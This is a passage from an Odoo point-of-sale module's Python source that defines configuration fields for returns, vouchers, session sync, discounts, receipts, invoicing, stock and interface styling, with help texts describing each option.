required_reason_return = fields.Boolean(\n 'Required Reason Return',\n help='Required Cashiers input Reason Return each line if Order is return'\n )\n display_return_days_receipt = fields.Boolean('Display Return Days on Receipt', default=0)\n display_onhand = fields.Boolean(\n 'Show Stock on Hand each Product', default=1,\n help='Display quantity on hand all products on pos screen')\n allow_order_out_of_stock = fields.Boolean(\n 'Allow Order when Product Out Of Stock',\n help='If uncheck, any product out of stock will blocked sale',\n default=1)\n allow_pos_categories_out_of_stock = fields.Many2many(\n 'pos.category',\n 'allow_pos_categories_out_of_stock',\n 'pos_config_id',\n 'pos_category_id',\n string='Allow some POS Categories can Sale when Out of Stock',\n help='Normally if [Allow Order when Product Out Of Stock] uncheck, if Products out of stock, POS will blocked sale. But if you set Categories here, it mean if Products of Categories added here will allow Sale when Out of Stock'\n )\n hide_product_when_outof_stock = fields.Boolean(\n 'Hide Product Out Of Stock',\n default=0)\n print_voucher = fields.Boolean(\n 'Create Voucher',\n help='Allow cashiers create Voucher Manual on POS',\n default=0)\n voucher_sequence_id = fields.Many2one('ir.sequence', 'Voucher Sequence')\n expired_days_voucher = fields.Integer(\n 'Expired days of Voucher',\n default=30,\n help='Total days keep voucher can use, \\n'\n 'if out of period days from create date, voucher will expired')\n sync_multi_session = fields.Boolean('Sync between Sessions', default=0)\n sync_play_sound = fields.Boolean('Sync Play Sound', default=0,\n help='When have new sync notification, browse will play sound')\n sync_multi_session_with = fields.Char('Sync with', compute='_get_sync_with_sessions')\n sync_multi_session_manual_stop = fields.Boolean('Sync Can manual stop by Users')\n sync_multi_session_alert_remove_order = fields.Boolean('Popup Alert when another Sessions Remove Orders')\n sync_to_pos_config_ids = fields.Many2many(\n 'pos.config',\n 'sync_session_rel',\n 'from_id',\n 'to_id',\n string='Sync with Point Of Sale',\n domain=\"['|', ('pos_branch_id', '=', pos_branch_id), ('pos_branch_id', '=', None)]\",\n help='Select POS Configs need sync with this POS Config \\n' \\\n 'Any event change orders from this Session of this POS will sync to your selected POS Config Sessions \\n'\n )\n sync_manual_button = fields.Boolean(\n 'Sync Manual Order',\n help='Allow POS Session of This Config send Orders to another Sessions direct \\n'\n 'If another Sessions have the same Order with current Sessions \\n'\n 'Orders of another Sessions will replace by Orders send from current Session')\n sync_multi_session_offline = fields.Boolean(\n 'Sync Between Session with Local Network',\n default=0,\n help='If not checked, normal sync between Sessions required Odoo Server Online \\n'\n 'If checked, we dont care Odoo offline or not \\n'\n 'All sync datas will sync direct POS/IOT Box'\n )\n sync_multi_session_offline_iot_ids = fields.Many2many(\n 'pos.iot', 'pos_config_iot_rel', 'pos_config_id',\n 'iot_box_id',\n string='IoT Boxes',\n help='Setup 1 pos/iot box \\n'\n 'And use it for Sync Point inside Your Shop/Restaurant Local Network \\n'\n 'This function only for our partnership \\n'\n 'If you need it, please go to our website: http://posodoo.com \\n'\n 'And looking to Professional Plan')\n sync_tracking_activities_user = fields.Boolean(\n 'Tracking Activities User',\n default=1,\n help='Tracking all activities of POS User \\n'\n 'Example: add new product, remove line ....'\n )\n display_person_add_line = fields.Boolean('Display information Lines', default=0,\n help=\"When you checked, on pos order lines screen, \\n\"\n \"will display information person created order \\n\"\n \"(lines) Eg: create date, updated date ..\")\n internal_transfer = fields.Boolean('Allow Internal Transfer', default=0,\n help='Go Inventory and active multi warehouse and location')\n\n discount = fields.Boolean('Active Global Discounts', default=0)\n discount_ids = fields.Many2many(\n 'pos.global.discount',\n 'config_discount_rel',\n 'config_id',\n 'discount_id',\n string='Global Discount Items'\n )\n delay = fields.Integer('Delay time', default=3000)\n\n discount_limit = fields.Boolean('Discount Limit', default=0)\n discount_limit_amount = fields.Float(\n 'Discount Limit (%)',\n help='This is maximum disc (%) cashier can set to each line',\n default=0)\n return_products = fields.Boolean('Return Products or Orders',\n help='Allow cashier return products or orders',\n default=0)\n return_method_id = fields.Many2one(\n 'pos.payment.method',\n string='Return Method'\n )\n return_covert_to_coupon = fields.Boolean(\n 'Return via Coupon',\n help='Normally you return Orders/Products of Customer via cash refund back \\n'\n 'This feature help you refund via Coupon Card \\n'\n 'And Customer save it and use Coupon in next Order'\n )\n return_coupon_program_id = fields.Many2one(\n 'coupon.program',\n domain=[('program_type', '=', 'coupon_program'), ('is_gift_card', '=', True)],\n string='Refund via Coupon Program'\n )\n return_duplicate = fields.Boolean(\n 'Allow duplicate Return Order',\n help='If checked, one Order can return many times'\n )\n return_viva_scan_barcode = fields.Boolean(\n 'Scan Barcode auto Return Order',\n default=1,\n )\n\n validate_payment = fields.Boolean('Validate Payment')\n validate_remove_order = fields.Boolean('Validate Remove Order')\n validate_new_order = fields.Boolean('Validate New Order')\n validate_change_minus = fields.Boolean('Validate Pressed +/-')\n validate_quantity_change = fields.Boolean('Validate Quantity Change')\n validate_quantity_change_type = fields.Selection([\n ('increase', 'Increase'),\n ('decrease', 'Decrease'),\n ('both', 'Both')\n ], string='Type of Validation Qty change', default='decrease')\n validate_price_change = fields.Boolean('Validate Price Change')\n validate_price_change_type = fields.Selection([\n ('increase', 'Increase'),\n ('decrease', 'Decrease'),\n ('both', 'Both')\n ], string='Type of Validation Price change', default='decrease')\n validate_discount_change = fields.Boolean('Validate Discount Change')\n validate_discount_change_type = fields.Selection([\n ('increase', 'Increase'),\n ('decrease', 'Decrease'),\n ('both', 'Both')\n ], string='Type of Validation Discount change', default='increase')\n validate_remove_line = fields.Boolean('Validate Remove Line')\n validate_return = fields.Boolean('Validate Return')\n validate_coupon = fields.Boolean('Validate Coupon (Gift Cards)')\n\n product_operation = fields.Boolean(\n 'Product Operation', default=0,\n help='Allow cashiers add pos categories and products on pos screen')\n quickly_payment_full = fields.Boolean('Quickly Paid Full')\n quickly_payment_method_id = fields.Many2one(\n 'pos.payment.method',\n string='Quickly Payment with Method')\n note_order = fields.Boolean('Note Order', default=0)\n signature_order = fields.Boolean('Signature Order', default=0)\n\n booking_orders = fields.Boolean(\n 'Booking Orders',\n default=0,\n help='Orders may be come from many sources locations\\n'\n 'Example: Web E-Commerce, Call center, or phone call order\\n'\n 'And your Cashiers will made Booking Orders and save it\\n'\n 'Your Shipper or customer come shop will delivery Orders')\n load_booked_orders_type = fields.Selection([\n ('last_7_days', 'Last 7 Days'),\n ('last_1_month', 'Last 30 Month'),\n ('last_1_year', 'Last 1 Year (365 days)'),\n ('load_all', 'Load All'),\n ],\n default='last_7_days',\n string='Period days loading Booked Orders'\n )\n booking_orders_load_orders_another_pos = fields.Boolean(\n 'Allow Load Order of another POS',\n default=1\n )\n booking_orders_alert = fields.Boolean(\n 'Alert Order Coming', default=0,\n help='When have any Booking Order come from another Source Location to POS\\n'\n 'POS will Alert one popup inform your cashier have new Order coming')\n booking_allow_confirm_sale = fields.Boolean(\n 'Delivery Booked Orders', default=0,\n help='Allow Cashier can Confirm Booked Orders and create Delivery Order')\n booking_orders_display_shipping_receipt = fields.Boolean('Shipping Address Receipt', default=0)\n display_tax_orderline = fields.Boolean('Display Taxes Order Line', default=0)\n display_tax_receipt = fields.Boolean('Display Taxes Receipt', default=0)\n display_image_orderline = fields.Boolean('Display Image on Order Lines', default=0)\n display_image_receipt = fields.Boolean('Display Image on Receipt', default=0)\n display_amount_discount = fields.Boolean('Display Amount Discount', default=1)\n category_wise_receipt = fields.Boolean(\n 'Category Wise Receipt',\n default=0,\n help='Bill will wise each POS Category')\n management_invoice = fields.Boolean('Display Invoices Screen', default=0)\n load_invoices_type = fields.Selection([\n ('last_7_days', 'Last 7 Days'),\n ('last_1_month', 'Last 1 Month (30 days)'),\n ('last_1_year', 'Last 1 Year (365 days)'),\n ('load_all', 'Load All'),\n ],\n default='last_7_days',\n string='Period days loading Invoices'\n )\n invoice_offline = fields.Boolean(\n 'Invoice Offline Mode',\n help='Any Orders come from POS Session always create invoice \\n'\n 'Invoice will create few second after POS Orders created \\n'\n 'This future not print invoice number on POS Receipt \\n'\n 'Only create invoice each order and auto post invoice when POS Order submitted to backend \\n'\n 'Please set Customer Default or all orders on POS required set Customer before do payment'\n )\n wallet = fields.Boolean(\n 'Wallet Card',\n help='Keeping all change money back to Customer Wallet Card\\n'\n 'Example: customer bought products with total amount is 9.5 USD\\n'\n 'Customer give your Cashier 10 USD, \\n'\n 'Default your cashier will return back change money 0.5 USD\\n'\n 'But Customer no want keep it, \\n'\n 'They need change money including to Wallet Card for next order\\n'\n 'Next Time customer come back, \\n'\n 'When your cashier choice client have Wallet Credit Amount bigger than 0\\n'\n 'Customer will have one more payment method via Wallet Credit')\n payment_journal_ids = fields.Many2many(\n 'account.journal',\n 'pos_config_invoice_journal_rel',\n 'config_id',\n 'journal_id',\n 'Save Invoice Journal with this Journal',\n domain=[('type', '=', 'sale')],\n help=\"Default POS Odoo save Invoice Journal from only one Invoicing Journal of POS Config\\n\"\n \"This future allow you add many Journals here\\n\"\n \"And when your cashier choice Journal on POS\\n\"\n \"Journal of Invoice will the same Journal selected by cashier\")\n send_invoice_email = fields.Boolean(\n 'Send email invoice',\n help='Help cashier send invoice to email of customer',\n default=0)\n customer_default_id = fields.Many2one(\n 'res.partner',\n 'Customer Default',\n help='This is customer automatic set to Order, \\n'\n 'When cashier create new order')\n auto_invoice = fields.Boolean(\n 'Auto Order to Invoice',\n help='Auto check to button Invoice on POS Payment Screen',\n default=0)\n auto_invoice_with_customer_default = fields.Boolean(\n 'Auto to Invoice if Customer default',\n help='Automatic Order to invoice if Customer Default',\n default=0\n )\n invoice_without_download = fields.Boolean(\n 'Order to Invoice without Download',\n help='When cashier choose Invoice on Payment Screen \\n'\n 'POS will automatic made invoice for Order \\n'\n 'And blocked download Invoice Receipt Pdf'\n )\n display_full_customer_information = fields.Boolean(\n 'Display full Customer Information on Receipt',\n help='If checked, Customer Email, Phone, Tin ...etc will display on Receipt', default=0)\n fiscal_position_auto_detect = fields.Boolean(\n 'Fiscal position auto detect',\n default=0\n )\n display_sale_price_within_tax = fields.Boolean(\n 'Display Sale Price Within Taxes',\n default=1\n )\n display_cost_price = fields.Boolean('Display Cost Price', default=0)\n display_product_ref = fields.Boolean('Display Product Ref', default=0)\n display_product_second_name = fields.Boolean(\n 'Display Product Second Name',\n default=1,\n help='If you need show Product Second Name on product record \\n'\n 'Active it for display second name on order cart and receipt/bill'\n )\n display_product_detail = fields.Boolean(\n 'Display Product Detail',\n help='Display Product Detail and Purchased Histories of Customer',\n default=1\n )\n allow_remove_product = fields.Boolean(\n 'Allow Remove Products',\n help='Allow cashier set Available in POS each Product to False'\n )\n allow_edit_product = fields.Boolean(\n 'Allow Edit Product',\n help='Allow cashier edit Product (ex: Name, Category, Price ....)ừa'\n )\n hide_product_image = fields.Boolean('Hide Product Image', default=0)\n multi_location = fields.Boolean('Update Stock each Location', default=0)\n update_stock_onhand = fields.Boolean('Allow Update Stock On Hand', default=0)\n multi_stock_operation_type = fields.Boolean('Multi Stock Operation Type')\n multi_stock_operation_type_ids = fields.Many2many(\n 'stock.picking.type',\n 'config_stock_picking_type_rel',\n 'config_id',\n 'stock_picking_type_id',\n string='Operation Types',\n domain=\"[('warehouse_id.company_id', '=', company_id)]\"\n )\n product_view = fields.Selection([\n ('box', 'Box View'),\n ('list', 'List View'),\n ], default='box', string='Product Screen View Type', required=1)\n product_image_size = fields.Selection([\n ('default', 'Default'),\n ('small', 'Small'),\n ('big', 'Big')\n ],\n default='big',\n string='Product Image Size')\n set_guest = fields.Boolean('Set Guests', default=0)\n set_guest_when_add_new_order = fields.Boolean(\n 'Auto Ask Guests',\n help='When Cashiers add Orders, pos auto popup and ask guest name and guest number')\n update_tax = fields.Boolean(\n 'Modify Taxes of Lines',\n default=0,\n help='Allow Cashiers can change Taxes of Lines')\n update_tax_ids = fields.Many2many(\n 'account.tax',\n 'pos_config_tax_rel',\n 'config_id',\n 'tax_id', string='List Taxes')\n review_receipt_before_paid = fields.Boolean(\n 'Print Receipt Before Payment',\n help='Allow Print Receipt without Payment',\n default=1)\n print_last_order = fields.Boolean(\n 'Print Last Receipt',\n default=0,\n help='Allow cashiers print last receipt')\n check_duplicate_email = fields.Boolean('Check duplicate email', default=0)\n check_duplicate_phone = fields.Boolean('Check duplicate phone', default=0)\n check_required_phone = fields.Boolean('Required Phone', default=0)\n check_required_email = fields.Boolean('Required Email', default=0)\n check_required_vat = fields.Boolean('Required Tax', default=0)\n\n add_sale_person = fields.Boolean('Add Sale Person', default=0)\n default_seller_id = fields.Many2one(\n 'res.users',\n 'Default Seller',\n help='This is Seller automatic assigned to new Orders and new Order Lines'\n )\n seller_ids = fields.Many2many(\n 'res.users',\n 'pos_config_sellers_rel',\n 'config_id',\n 'user_id',\n string='Sellers',\n help='This is list sellers use for choice and add to Order or Order Line')\n force_seller = fields.Boolean(\n 'Force Seller',\n help='When Your POS session select/change another Seller \\n'\n 'POS auto assigned New Seller to each Line of Order Cart',\n default=0)\n logo = fields.Binary('Receipt Logo')\n payment_coin = fields.Boolean('Payment Coin')\n payment_coin_ids = fields.Many2many('pos.quickly.payment', string='Coins')\n backup_orders = fields.Text('Backup Orders', readonly=1)\n backup_orders_automatic = fields.Boolean(\n 'Automatic BackUp Orders',\n help='Schedule 5 seconds, POS Session automatic backup Orders to BackEnd Odoo \\n'\n 'If POS Sessions Screen crashed, Computer PC Crashed or Browse Crashed ... could not open POS back \\n'\n 'Them can change to another PC, Devices and Open POS Session back \\n'\n 'Last Orders not Paid will automatic restore \\n'\n 'Nothing Unpaid Orders lost on POS Session \\n'\n 'Only Case will lost UnPaid Orders: POS Users turnoff Internet and them Remove Cache of Browse (**)\\n'\n 'With (**), we have not solution for covert It. Required Input Orders Unpaid Manual back'\n )\n management_session = fields.Boolean(\n 'Management Cash Control',\n default=0,\n help='Allow pos users can take money in/out session\\n'\n 'If you active this future please active Cash Control of POS Odoo Original too'\n )\n cash_inout_reason_ids = fields.Many2many(\n 'product.product',\n 'pos_config_cash_inout_product_rel',\n 'config_id',\n 'product_id',\n string='Cash In/Out Reason')\n barcode_receipt = fields.Boolean('Display Barcode Receipt', default=0)\n qrcode_receipt = fields.Text(\n 'QrCode Link',\n default='https://apps.odoo.com/apps/modules/14.0/pos_retail/'\n )\n html_receipt_design = fields.Boolean('Design Header and Footer via HTML')\n html_header = fields.Text('Html Header of Receipt')\n html_footer = fields.Text('Html Footer of Receipt')\n receipt_title = fields.Char('Receipt Title', default='*** RECEIPT ***')\n receipt_font_size = fields.Integer(\n 'Receipt Font Size (px)',\n default=22,\n help='Set range 18 to 24'\n )\n receipt_template = fields.Selection([\n ('odoo_original', 'Odoo Original POS Receipt Template'),\n ('retail', 'POS Retail Receipt Template (included custom)')\n ], default='odoo_original', string='Default POS Receipt Template', required=1)\n print_delivery_report = fields.Boolean(\n 'Print Delivery Report',\n default=0,\n help='If you active it \\n'\n 'When Cashiers print POS Bill, POS auto print PDF Delivery Order Report'\n )\n print_order_report = fields.Boolean('Print Order Report',\n default=0,\n help='If you active it \\n'\n 'When Cashiers print POS Bill, POS auto print PDF POS Order Report'\n )\n hide_mobile = fields.Boolean(\"Hide Client's Mobile\", default=1)\n hide_phone = fields.Boolean(\"Hide Client's Phone\", default=1)\n hide_email = fields.Boolean(\"Hide Client's Email\", default=1)\n update_client = fields.Boolean(\n 'Allow Update Clients',\n default=1,\n help='Uncheck if you dont want cashier change customer information on pos')\n add_client = fields.Boolean(\n 'Allow Add Client',\n help='Allow POS Session can create new Client')\n archive_client = fields.Boolean(\n 'Archive Client',\n default=0,\n help='Remove client out of POS, Customer set active is False \\n'\n 'Still saved at inside your database but not display in POS Clients Screen'\n )\n remove_client = fields.Boolean('Allow Remove Clients',\n help='Uncheck if you dont want cashier remove customers on pos')\n report_signature = fields.Boolean(string=\"Report Signature\", default=0)\n\n report_product_summary = fields.Boolean(string=\"Report Product Summary\", default=0)\n report_product_summary_auto_check_product = fields.Boolean('Auto Checked to Product Summary')\n report_product_summary_auto_check_category = fields.Boolean('Auto Checked to Product Category Summary')\n report_product_summary_auto_check_location = fields.Boolean('Auto Checked to Product Location Summary')\n report_product_summary_auto_check_payment = fields.Boolean('Auto Checked to Product Payment Summary')\n\n report_order_summary = fields.Boolean(string='Report Order Summary', default=0)\n report_order_summary_auto_check_order = fields.Boolean('Auto Checked to Order Summary')\n report_order_summary_auto_check_category = fields.Boolean('Auto Checked to Order Category Summary')\n report_order_summary_auto_check_payment = fields.Boolean('Auto Checked to Order Payment Summary')\n report_order_summary_default_state = fields.Selection([\n ('new', 'New'),\n ('paid', 'Paid'),\n ('posted', 'Posted'),\n ('invoiced', 'Invoiced'),\n ('all', 'All')\n ], string='Report with state', default='all')\n\n report_payment_summary = fields.Boolean(string=\"Report Payment Summary\", default=0)\n report_sale_summary = fields.Boolean('Report Sale Summary (Z-Report)')\n report_sale_summary_show_profit = fields.Boolean('Report Sale Summary show Gross/Profit')\n default_product_sort_by = fields.Selection([\n ('a_z', 'Sort Name A to Z'),\n ('z_a', 'Sort Name Z to A'),\n ('low_price', 'Sort from Low to High Sale Price'),\n ('high_price', 'Sort from High to Low Sale Price'),\n ('pos_sequence', 'Product POS Sequence')\n ], string='Default Sort By', default='a_z')\n add_customer_before_products_already_in_shopping_cart = fields.Boolean(\n 'Required choice Client before Add to Cart',\n help='Add customer before products \\n'\n 'already in shopping cart',\n default=0)\n allow_cashier_select_pricelist = fields.Boolean(\n 'Allow Cashier select Pricelist',\n help='If uncheck, pricelist only work when select customer.\\n'\n ' Cashiers could not manual choose pricelist',\n default=1)\n big_datas_sync_realtime = fields.Boolean(\n 'Sync Realtime (Products and Customers) with Backend',\n help='Any modifiers products and partners \\n'\n 'Automatic sync direct to POS Screen when them find products and partners',\n default=1)\n big_datas_sync_realtime_pricelist = fields.Boolean(\n 'Sync Realtime Pricelist',\n help='Any modifiers Pricelist\\n'\n 'Automatic sync direct to POS Screen',\n )\n sale_with_package = fields.Boolean(\n 'Sale with Package')\n allow_set_price_smaller_min_price = fields.Boolean(\n 'Allow Cashier set Price smaller than Sale Price of Product',\n default=1)\n create_lots = fields.Boolean('Allow Create Lots/Serial', help='Allow cashier create Lots/Serials on pos')\n fullfill_lots = fields.Boolean('Auto fullfill Lot', default=1)\n promotion_ids = fields.Many2many(\n 'pos.promotion',\n 'pos_config_promotion_rel',\n 'config_id',\n 'promotion_id',\n string='Promotions Applied')\n pos_branch_id = fields.Many2one('pos.branch', 'Branch')\n\n stock_location_ids = fields.Many2many(\n 'stock.location', string='Stock Locations',\n help='Stock Locations for cashier select checking stock on hand \\n'\n 'and made picking source location from location selected',\n domain=[('usage', '=', 'internal')])\n validate_by_manager = fields.Boolean('Validate by Managers')\n discount_unlock_by_manager = fields.Boolean('Unlock Limit Discount by Manager')\n manager_ids = fields.Many2many('res.users', 'pos_config_res_user_manager_rel', 'config_id', 'user_id',\n string='Manager Validation')\n stock_location_id = fields.Many2one('stock.location', string='POS Default Source Location',\n related='picking_type_id.default_location_src_id',\n readonly=1)\n stock_location_dest_id = fields.Many2one('stock.location', string='POS Default Dest Location',\n related='picking_type_id.default_location_dest_id',\n readonly=1)\n receipt_display_subtotal = fields.Boolean('Receipt Display Sub Total', default=1)\n receipt_display_taxes = fields.Boolean('Receipt Display Taxes', default=1)\n receipt_display_warehouse = fields.Boolean('Receipt Display Warehouse', default=1)\n receipt_header_style = fields.Selection([\n ('left', 'Left'),\n ('center', 'Center'),\n ('right', 'Right')\n ],\n default='center',\n string='Header Receipt Style',\n help='Header style, this future only apply on iotbox Odoo CE. \\n'\n 'Odoo EE not support. \\n'\n 'Not apply for printer direct web browse'\n )\n receipt_display_unit = fields.Boolean(\n 'Receipt Display Unit of Measure',\n default=1\n )\n receipt_manual_download_invoice = fields.Boolean(\n 'Receipt Manual Download Invoice',\n default=1\n )\n validate_order_without_receipt = fields.Boolean(\n 'Validate Order without Print Receipt',\n help='Orders pushing to backend without Print Receipt \\n'\n 'Allow cashier full fill payment on Payment Screen \\n'\n 'When it Done, click Validate for next new Order, bypass Print Receipt step',\n default=0,\n )\n discount_value = fields.Boolean('Discount Value')\n discount_value_limit = fields.Float(\n 'Discount Value Limit',\n help='This is maximum Amount Discount Cashier can set to each Line'\n )\n posbox_save_orders = fields.Boolean('Save Orders on PosBox')\n posbox_save_orders_iot_ids = fields.Many2many(\n 'pos.iot',\n 'pos_config_iot_save_orders_rel',\n 'config_id',\n 'iot_id',\n string='IoT boxes'\n )\n posbox_save_orders_server_ip = fields.Char(\n 'Odoo Public Ip Address',\n help='Example Ip: 192.168.100.100'\n )\n posbox_save_orders_server_port = fields.Char(\n 'Odoo Public Port Number',\n default='8069',\n help='Example Port: 8069'\n )\n analytic_account_id = fields.Many2one(\n 'account.analytic.account',\n 'Analytic Account'\n )\n limit_categories = fields.Boolean(\"Restrict Available Product Categories\")\n iface_available_categ_ids = fields.Many2many(\n 'pos.category',\n string='Available PoS Product Categories',\n help='The point of sale will only display products \\n'\n 'which are within one of the selected category trees. \\n'\n 'If no category is specified, all available products will be shown')\n barcode_scan_with_camera = fields.Boolean(\n 'Use Camera Scan Barcode',\n help='If you check it, and your device use POS have camera \\n'\n 'You can use camera of device scan barcode for add products, return orders ....\\n'\n 'This future only supported web browse and SSL \\n'\n 'SSL required if you are on cloud. As without SSL permission of camera not work.'\n )\n barcode_scan_timeout = fields.Float(\n 'Times timeout',\n default=1000,\n help='Period times timeout for next scan\\n'\n '1000 = 1 second\\n'\n 'I good time for scan we think 1000'\n )\n rounding_automatic = fields.Boolean('Rounding Automatic',\n help='When cashier go to Payment Screen, POS auto rounding')\n rounding_type = fields.Selection([\n ('rounding_by_decimal_journal', 'By Decimal Rounding of Journal'),\n ('rounding_integer', 'Rounding to Integer'),\n ],\n default='rounding_integer',\n help='By Decimal Rounding Journal: We will follow rounding of Journal Decimal Rounding Amount\\n'\n 'Rounding Integer: \\n'\n 'From decimal from 0 to 0.25 become 0\\n'\n 'From decimal from 0.25 to 0.75 become 0.5\\n'\n 'From decimal from 0.75 to 0.999 become to 1')\n\n service_charge_ids = fields.Many2many(\n 'pos.service.charge',\n 'pos_config_service_charge_rel',\n 'config_id',\n 'charge_id',\n string='Services Charge'\n )\n service_shipping_automatic = fields.Boolean(\n 'Service Shipping Automatic',\n help='When cashier select Customer \\n'\n 'POS auto compute distance (km) from your Shop Stock Location to Partner Address \\n'\n 'And get distance for compute shipping cost, automatic add this cost to cart'\n )\n google_map_api_key = fields.Char('Google Map Api Key', invisible=True)\n payment_reference = fields.Boolean(\n 'Payment Reference',\n help='Allow cashier add reference Note each payment line'\n )\n display_margin = fields.Boolean('Display Margin %')\n allow_split_table = fields.Boolean('Allow Split Table')\n allow_merge_table = fields.Boolean('Merge/Combine Tables')\n allow_lock_table = fields.Boolean(\n 'Lock Table',\n default=0,\n help='If Customer Booked Table, you can lock talbe \\n'\n 'Unlock by Pos Pass In of Managers Validation')\n required_set_guest = fields.Boolean(\n 'Auto ask Guests when add new Order')\n start_session_oneclick = fields.Boolean(\n 'Start Session One Click'\n )\n translate_products_name = fields.Boolean(\n 'Load Translate Products Name',\n help='When active, all products name language will load correct language of language POS User started session',\n default=0\n )\n set_product_name_from_field = fields.Selection(\n _get_product_field_char,\n default='name',\n string='Product Name display by field',\n help=\"Choose the field of the table Product which will be used for Product Display\"\n )\n replace_partners_name = fields.Boolean(\n 'Replace Partners Name',\n help='When active, partners name will replace buy field you choose bellow',\n default=0\n )\n set_partner_name_from_field = fields.Selection(\n _get_customer_field_char,\n default='name',\n string='Customer Name display from field',\n help=\"Choose the field of the table Customer which will be used for Customer Display\"\n )\n default_display_cart = fields.Boolean(\n 'Default Display Cart',\n default=0,\n help='If uncheck, default Product Screen cart list will automatic invisible'\n )\n add_order_fields_to_receipt = fields.Many2many(\n 'ir.model.fields',\n 'pos_config_order_ir_model_fields_rel',\n 'config_id',\n 'field_id',\n domain=[\n ('model', '=', 'pos.order'),\n ('ttype', 'not in', ['binary', 'one2many', 'many2many'])\n ],\n string='Order fields Display',\n help='Fields added here will display on receipt'\n )\n add_picking_field_to_receipt = fields.Selection(\n _get_picking_field_char,\n default='name',\n string='Add Picking Field to Receipt',\n help=\"Please choose one field of Delivery Object\\n\"\n \"Display to your POS receipt\"\n )\n add_picking_fields_to_receipt = fields.Many2many(\n 'ir.model.fields',\n 'pos_config_picking_ir_model_fields_rel',\n 'config_id',\n 'field_id',\n domain=[\n ('model', '=', 'stock.picking'),\n ('ttype', 'not in', ['binary', 'one2many', 'many2many'])\n ],\n string='Delivery fields Display',\n help='Fields added here will display on receipt'\n )\n add_invoice_field_to_receipt = fields.Selection(\n _get_invoice_field_char,\n default='name',\n string='Add Invoice Field to Receipt',\n help=\"Please choose one field of Invoice Object\\n\"\n \"for Display to your POS receipt\"\n )\n add_invoices_field_to_receipt = fields.Many2many(\n 'ir.model.fields',\n 'pos_config_invoice_ir_model_fields_rel',\n 'config_id',\n 'field_id',\n domain=[\n ('model', '=', 'account.move'),\n ('ttype', 'not in', ['binary', 'one2many', 'many2many'])\n ],\n string='Invoice fields Display',\n help='Fields added here will display on receipt'\n )\n create_quotation = fields.Boolean(\n 'Create Quotation Order (Call Center)',\n help='Allow cashier create Quotation Order, \\n'\n 'If customer full fill payment order, automatic processing to paid \\n'\n 'Else cashier can cancel quotation direct POS screen'\n )\n assign_orders_to_config_ids = fields.Many2many(\n 'pos.config',\n 'pos_config_assign_orders_rel',\n 'from_config_id',\n 'assign_config_id',\n string='Allow Assign Orders to POS'\n )\n display_logo = fields.Boolean(\n 'Display Logo',\n default=1,\n help='If you uncheck, logo will not display on POS Receipt'\n )\n product_generic_option = fields.Boolean(\n 'Product Generic Option',\n help='Generic product options. \\n'\n 'It should be possible to define certain product options that can be applied to any product \\n'\n 'Example: \"Whipped cream\" or \"Extra hot\".\\n'\n 'Generic product options may have an additional cost and materials list. \\n'\n 'If you active this option, please go to Retail Operation / Product Generic Option and add datas'\n )\n mrp = fields.Boolean(\n 'Manufacturing',\n help='If each POS Line, cashier select assign BOM (Bill Of Material)\\n'\n 'When Cashier finish input BOM each POS Line \\n'\n 'Manufacturing Order will create and automatic processing \\n'\n )\n mrp_bom_auto_assign = fields.Boolean(\n 'Auto Assign Bom',\n help='If product have only one BOM \\n'\n 'POS auto assign BOM to Order Line'\n )\n mrp_auto_confirm = fields.Boolean('Production Auto Confirm')\n mrp_auto_assign = fields.Boolean('Production Auto Assign')\n mrp_auto_done = fields.Boolean('Production Auto Done')\n mrp_produce_direct = fields.Boolean(\n 'Create MRP Produce Direct',\n default=0,\n help='Allow Cashier create MRP Produce Direct from POS Screen'\n )\n limited_products_display = fields.Integer(\n string='Limited Products Display',\n default=50,\n help='Set number limited Products Display on POS Screen \\n'\n 'Example: set 10, only maximum 10 items display on POS Screen \\n'\n 'When cashier input search box, products will render more.'\n )\n last_save_cache = fields.Char('Last Save Cache', compute='_get_last_save_cache')\n display_sequence_number = fields.Boolean(\n 'Display Sequence Number',\n default=True,\n )\n point_of_sale_update_stock_quantities = fields.Selection([\n ('closing', 'At the session closing (advised)'),\n ('real', 'In real time'),\n ],\n default='real',\n string=\"Update quantities in stock\",\n required=1,\n help=\"At the session closing: A picking is created for the entire session when it's closed\\n In real time: Each order sent to the server create its own picking\")\n\n duplicate_receipt = fields.Boolean('Duplicate Receipt')\n duplicate_number = fields.Integer('Duplicate Number', default=2)\n\n multi_session = fields.Boolean(\n 'Allow Multi Session',\n help='Each Employee will assign 1 POS Session \\n'\n 'Difference Employee is difference POS Session'\n )\n product_category_ids = fields.Many2many(\n 'product.category',\n 'pos_config_product_category_rel',\n 'config_id',\n 'category_id',\n string='Loading from Sale Product Categories',\n )\n sessions_opened = fields.Boolean(\n 'Have Sessions Opened',\n compute='_check_has_sessions_not_closed'\n )\n create_category_direct = fields.Boolean('Create POS Category Direct')\n create_product_direct = fields.Boolean('Create Product Direct')\n customer_facing_screen = fields.Boolean('Customer Facing Screen', default=1)\n customer_facing_screen_width = fields.Integer('Width Customer Screen', default=1440)\n customer_facing_screen_height = fields.Integer('Height Customer Screen', default=900)\n rounding = fields.Boolean('Rounding Cash')\n rounding_factor = fields.Float('Rounding Factor', default='1.0')\n decimal_places = fields.Integer('Decimal Places', default=0)\n\n font_family = fields.Char(\n 'Font Family',\n default='\"Montserrat\", \"Odoo Unicode Support Noto\", sans-serif'\n )\n background = fields.Char(\n 'Background of App',\n default='#fff',\n help='Background of POS Screen'\n )\n primary_color = fields.Char(\n 'Primary color of App',\n default='#FF5722',\n help='Backgroud of Payment, Set Customer ... buttons'\n )\n secondary_color = fields.Char('Secondary color of App', default='#6EC89B')\n three_color = fields.Char('Three of App', default='#875A7B')\n cart_box_style = fields.Selection([\n ('left', 'Left of Page'),\n ('right', 'Right of Page')\n ], default='left', required=1, string='Cart position of Page')\n product_screen_background = fields.Char('Product Screen Background', default='#875A7B')\n cart_background = fields.Char('Cart Background', default='#ffffff')\n payment_screen_background = fields.Char('Payment Screen Background', default='#fff')\n header_color = fields.Char('Header Screen Background', default='#875A7B')\n\n product_width = fields.Integer(\n 'Product Width (em)',\n default=18,\n help='Default width of Product box is 18em',\n required=1\n )\n product_height = fields.Integer(\n 'Product Height (em)',\n default=18,\n help='Default height of Product box is 18em',\n required=1)\n display_product_image = fields.Selection([\n ('none', 'Not Display'),\n ('inline-block', 'Display')\n ],\n default='inline-block',\n required=1,\n string=\"Display Product's Image\")\n cart_width = fields.Integer(\n 'Cart List Width (px)',\n default=650\n )\n\n whatsapp_api = fields.Char('WhatApp Api')\n whatsapp_token = fields.Char('WhatApp Token')\n whatsapp_send_type = fields.Selection([\n ('automatic', 'Automatic'),\n ('manual', 'Manual')\n ], string='WhatApp send Receipt Type', default='manual')\n whatsapp_message_receipt = fields.Text(\n 'WhatsApp Message Receipt',\n default='Thank you for giving us the opportunity to serve you. This is your receipt'\n 